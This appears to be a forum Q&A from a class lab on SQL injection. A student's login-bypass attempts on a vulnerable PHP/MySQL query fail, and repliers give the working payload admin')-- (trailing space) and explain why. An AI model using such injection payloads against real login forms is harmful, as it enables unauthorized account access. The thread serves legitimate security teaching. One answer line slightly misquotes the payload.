# SQL-Injection Troubles

Tags: sql-injection

We are working on a lab in class and I cannot seem to find what I am missing. The following code is an SQL Query for authenticating users:

```
  $sel1 = mysql_query ("SELECT ID, name, locale, lastlogin, gender,
    FROM USERS_TABLE
    WHERE (name = ’$user’ OR email = ’$user’) AND pass = ’$pass’");
  $chk = mysql_fetch_array($sel1);
  if (found one record)
  then {allow the user to login}
```

We are supposed to locate a the SQL-Injection vulnerability which I believe lies in:

```
  WHERE (name = ’$user’ OR email = ’$user’) AND pass = ’$pass’");
```

To exploit it we are basically supposed to log in to an admin profile on a website with a pretty generic username and password form. The given information is that we know the profile name is admin. And we are supposed to exploit the username entry on the website only.

After reading the following article [Security Idiots](http://securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html) and a section out of a book *Penetration Testing A Hands-On Introduction to Hacking* by Georgia Weidman. These are some of the things I tried:

- admin' OR 1--
- admin'--
- admin' AND 1=1--

And much more variations of this. My understanding is that I am selecting the admin profile completing that section with the "'" then forcing true and killing the rest of the code on that line. However, nothing I try seems to be working.

It is also important to note that for this lab we have special configured virtual machines that allow this attack to work.

So am I on the right track or am I not understanding the logic behind a SQL-Injection attack. I am not necessarily looking for what is the code I am looking for but I am worried I am heading off in the wrong direction and am missing something.

Any help is much appreciated. And I would be happy to elaborate on anything.
Thank you.

Comment: Try `admin')--` also are you sure that the sql in the question is correct? `gender, FROM USERS_TABLE` there shouldn't  be a comma before `FROM`

Comment: Unfortunately, no dice on that username entry either. And I originally copied that code from our lab instructions it is not actually from the file itself so there could possibly be typing errors from the instructions. We are not given the file location. Would this effect the exploit? The code must be operational because several students have completed it according to the Dropbox submissions. So if there isn't supposed to be a comma I imagine in the file it is not present.

Comment: Having that comma before `FROM` is an SQL error. But since you are sure that the code is working maybe it is just a typo.

Comment: Just a Note: In MySQL, the --  (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).

Comment: @Azi you are right that was the mistake. @codey `admin')-- ` should work. Can you try the same thing but give a space at the end and check?

Answer (score 0, accepted):

Thanks to Azi for pointing out the issue with space.

The SQL you where supposed to crack was

```
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = '$user' OR email = '$user') AND pass = '$pass'
```

Any of the `admin' OR 1--`, `admin'--`, `admin' AND 1=1--` would not work because when `user` variable gets substituted with these inputs the statements become

```
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin' OR 1-- ' OR email = '$user') AND pass = '$pass'

SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin'-- ' OR email = ’$user’) AND pass = ’$pass’

SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin' AND 1=1-- ' OR email = ’$user’) AND pass = ’$pass’
```

All of which are syntax errors since opened bracket `(` is not closed

When you give `admin'--` (giving space at the end of your input is important) the input statement becomes

```
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin')-- ' OR email = ’$user’) AND pass = ’$pass’"
```

The SQL has no syntax error and will select the record with name as admin.

Comment: @Azi Thank you for point out the space issue. That must have been my issue when first trying Arun 'admin')--'. I appreciate all the feedback everyone.